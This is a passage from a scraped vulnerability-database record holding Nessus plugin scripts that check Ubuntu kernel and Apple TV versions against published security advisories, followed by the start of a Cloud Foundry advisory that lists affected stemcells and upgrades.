(CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in\nthe ext4 filesystem implementation in the Linux kernel. An attacker\ncould use this to construct a malicious ext4 image that, when mounted,\ncould cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux\nkernel did not properly keep meta-data information consistent in some\nsituations. An attacker could use this to construct a malicious ext4\nimage that, when mounted, could cause a denial of service (system\ncrash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in\nthe Linux kernel contained a buffer overflow when handling extended\nattributes. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly handle an error condition with a corrupted xfs\nimage. An attacker could use this to construct a malicious xfs image\nthat, when mounted, could cause a denial of service (system crash).\n(CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid\nfile creation when performed by a non-member of the group. A local\nattacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in\nthe Linux kernel contained an integer overflow. A local attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2018-13406).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3753-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/24\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-13168\", \"CVE-2018-10876\", \"CVE-2018-10877\", \"CVE-2018-10878\", \"CVE-2018-10879\", \"CVE-2018-10881\", \"CVE-2018-10882\", \"CVE-2018-12233\", \"CVE-2018-13094\", \"CVE-2018-13405\", \"CVE-2018-13406\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3753-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-1028-aws\", pkgver:\"4.4.0-1028.31\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-134-generic\", pkgver:\"4.4.0-134.160~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-134-generic-lpae\", pkgver:\"4.4.0-134.160~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-134-lowlatency\", pkgver:\"4.4.0-134.160~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-aws\", pkgver:\"4.4.0.1028.28\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lpae-lts-xenial\", pkgver:\"4.4.0.134.114\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lts-xenial\", pkgver:\"4.4.0.134.114\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-lowlatency-lts-xenial\", pkgver:\"4.4.0.134.114\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 
\"linux-image-4.4-aws / linux-image-4.4-generic / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:34:18", "bulletinFamily": "scanner", "description": "It was discovered that the generic SCSI driver in the Linux kernel did\nnot properly enforce permissions on kernel memory access. A local\nattacker could use this to expose sensitive information or possibly\nelevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the\next4 filesystem implementation in the Linux kernel. An attacker could\nuse this to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4\nfilesystem implementation in the Linux kernel. An attacker could use\nthis to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in\nthe ext4 filesystem implementation in the Linux kernel. An attacker\ncould use this to construct a malicious ext4 image that, when mounted,\ncould cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux\nkernel did not properly keep meta-data information consistent in some\nsituations. An attacker could use this to construct a malicious ext4\nimage that, when mounted, could cause a denial of service (system\ncrash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in\nthe Linux kernel contained a buffer overflow when handling extended\nattributes. 
A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly handle an error condition with a corrupted xfs\nimage. An attacker could use this to construct a malicious xfs image\nthat, when mounted, could cause a denial of service (system crash).\n(CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid\nfile creation when performed by a non-member of the group. A local\nattacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in\nthe Linux kernel contained an integer overflow. A local attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2018-13406).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-3753-1.NASL", "href": "https://www.tenable.com/plugins/nessus/112111", "published": "2018-08-24T00:00:00", "title": "Ubuntu 16.04 LTS : linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities (USN-3753-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3753-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112111);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/09/18 12:31:48\");\n\n script_cve_id(\"CVE-2017-13168\", \"CVE-2018-10876\", \"CVE-2018-10877\", \"CVE-2018-10878\", \"CVE-2018-10879\", \"CVE-2018-10881\", \"CVE-2018-10882\", \"CVE-2018-12233\", \"CVE-2018-13094\", \"CVE-2018-13405\", \"CVE-2018-13406\");\n script_xref(name:\"USN\", value:\"3753-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities (USN-3753-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the generic SCSI driver in the Linux kernel did\nnot properly enforce permissions on kernel memory access. A local\nattacker could use this to expose sensitive information or possibly\nelevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the\next4 filesystem implementation in the Linux kernel. An attacker could\nuse this to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4\nfilesystem implementation in the Linux kernel. An attacker could use\nthis to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in\nthe ext4 filesystem implementation in the Linux kernel. 
An attacker\ncould use this to construct a malicious ext4 image that, when mounted,\ncould cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux\nkernel did not properly keep meta-data information consistent in some\nsituations. An attacker could use this to construct a malicious ext4\nimage that, when mounted, could cause a denial of service (system\ncrash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in\nthe Linux kernel contained a buffer overflow when handling extended\nattributes. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly handle an error condition with a corrupted xfs\nimage. An attacker could use this to construct a malicious xfs image\nthat, when mounted, could cause a denial of service (system crash).\n(CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid\nfile creation when performed by a non-member of the group. A local\nattacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in\nthe Linux kernel contained an integer overflow. A local attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2018-13406).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3753-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-13168\", \"CVE-2018-10876\", \"CVE-2018-10877\", \"CVE-2018-10878\", \"CVE-2018-10879\", \"CVE-2018-10881\", \"CVE-2018-10882\", \"CVE-2018-12233\", \"CVE-2018-13094\", \"CVE-2018-13405\", \"CVE-2018-13406\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3753-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1032-kvm\", pkgver:\"4.4.0-1032.38\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1066-aws\", pkgver:\"4.4.0-1066.76\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1095-raspi2\", pkgver:\"4.4.0-1095.103\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1099-snapdragon\", pkgver:\"4.4.0-1099.104\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-134-generic\", pkgver:\"4.4.0-134.160\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-134-generic-lpae\", pkgver:\"4.4.0-134.160\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-134-lowlatency\", pkgver:\"4.4.0-134.160\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-aws\", pkgver:\"4.4.0.1066.68\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic\", pkgver:\"4.4.0.134.140\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.4.0.134.140\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-kvm\", pkgver:\"4.4.0.1032.31\")) 
flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.4.0.134.140\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-raspi2\", pkgver:\"4.4.0.1095.95\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-snapdragon\", pkgver:\"4.4.0.1099.91\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-aws / linux-image-4.4-generic / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-17T18:14:15", "bulletinFamily": "scanner", "description": "According to its banner, the version of the remote Apple TV device is\nprior to 9.2.2. It is, therefore, affected by multiple vulnerabilities\nin the following components :\n\n - CoreGraphics\n - ImageIO\n - IOAcceleratorFamily\n - IOHIDFamily\n - Kernel\n - libxml2\n - libxslt\n - Sandbox Profiles\n - WebKit\n - WebKit Page Loading\n\nNote that only 4th generation models are affected by the\nvulnerabilities.", "modified": "2019-11-02T00:00:00", "id": "APPLETV_9_2_2.NASL", "href": "https://www.tenable.com/plugins/nessus/92494", "published": "2016-07-21T00:00:00", "title": "Apple TV < 9.2.2 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92494);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\n \"CVE-2016-1684\",\n \"CVE-2016-1836\",\n \"CVE-2016-1863\",\n \"CVE-2016-1865\",\n \"CVE-2016-4447\",\n \"CVE-2016-4448\",\n \"CVE-2016-4449\",\n \"CVE-2016-4483\",\n \"CVE-2016-4582\",\n \"CVE-2016-4583\",\n \"CVE-2016-4584\",\n \"CVE-2016-4585\",\n \"CVE-2016-4586\",\n \"CVE-2016-4587\",\n \"CVE-2016-4588\",\n \"CVE-2016-4589\",\n 
\"CVE-2016-4591\",\n \"CVE-2016-4592\",\n \"CVE-2016-4594\",\n \"CVE-2016-4607\",\n \"CVE-2016-4608\",\n \"CVE-2016-4609\",\n \"CVE-2016-4610\",\n \"CVE-2016-4612\",\n \"CVE-2016-4614\",\n \"CVE-2016-4615\",\n \"CVE-2016-4616\",\n \"CVE-2016-4619\",\n \"CVE-2016-4622\",\n \"CVE-2016-4623\",\n \"CVE-2016-4624\",\n \"CVE-2016-4626\",\n \"CVE-2016-4627\",\n \"CVE-2016-4631\",\n \"CVE-2016-4632\",\n \"CVE-2016-4637\",\n \"CVE-2016-4642\",\n \"CVE-2016-4643\",\n \"CVE-2016-4644\",\n \"CVE-2016-4653\"\n );\n script_bugtraq_id(\n 90013,\n 90856,\n 90864,\n 90865,\n 90876,\n 91358,\n 91826,\n 91827,\n 91828,\n 91830,\n 91831,\n 91834\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2016-07-18-4\");\n\n script_name(english:\"Apple TV < 9.2.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of the remote Apple TV device is\nprior to 9.2.2. It is, therefore, affected by multiple vulnerabilities\nin the following components :\n\n - CoreGraphics\n - ImageIO\n - IOAcceleratorFamily\n - IOHIDFamily\n - Kernel\n - libxml2\n - libxslt\n - Sandbox Profiles\n - WebKit\n - WebKit Page Loading\n\nNote that only 4th generation models are affected by the\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT206905\");\n # https://lists.apple.com/archives/security-announce/2016/Jul/msg00003.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8c0647e9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 9.2.2 or later. 
Note that this update is\nonly available for 4th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4448\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\n# fix\nfixed_build = \"13Y825\";\ntvos_ver = '9.2.2'; # for reporting purposes only\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : 4,\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_HOLE,\n xss : TRUE\n);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:53", "bulletinFamily": "software", "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3753-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not properly enforce permissions on kernel memory access. A local attacker could use this to expose sensitive information or possibly elevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the ext4 filesystem implementation in the Linux kernel. 
An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in the ext4 filesystem implementation in the Linux kernel. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux kernel did not properly keep meta-data information consistent in some situations. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in the Linux kernel contained a buffer overflow when handling extended attributes. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly handle an error condition with a corrupted xfs image. An attacker could use this to construct a malicious xfs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid file creation when performed by a non-member of the group. A local attacker could use this to gain elevated privileges. 
(CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in the Linux kernel contained an integer overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-13406)\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * Cloud Foundry BOSH trusty-stemcells are vulnerable, including: \n * 3363.x versions prior to 3363.74\n * 3421.x versions prior to 3421.81\n * 3445.x versions prior to 3445.66\n * 3468.x versions prior to 3468.67\n * 3541.x versions prior to 3541.46\n * 3586.x versions prior to 3586.40\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH trusty-stemcells: \n * Upgrade 3363.x versions to 3363.74\n * Upgrade 3421.x versions to 3421.81\n * Upgrade 3445.x versions to 3445.66\n * Upgrade 3468.x versions to 3468.67\n * Upgrade 3541.x versions to 3541.46\n * Upgrade 3586.x versions to 3586.40\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-trusty>).\n\n# References\n\n * [USN-3753-2](<https://usn.ubuntu.com/3753-2>)\n * [CVE-2017-13168](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-13168>)\n * 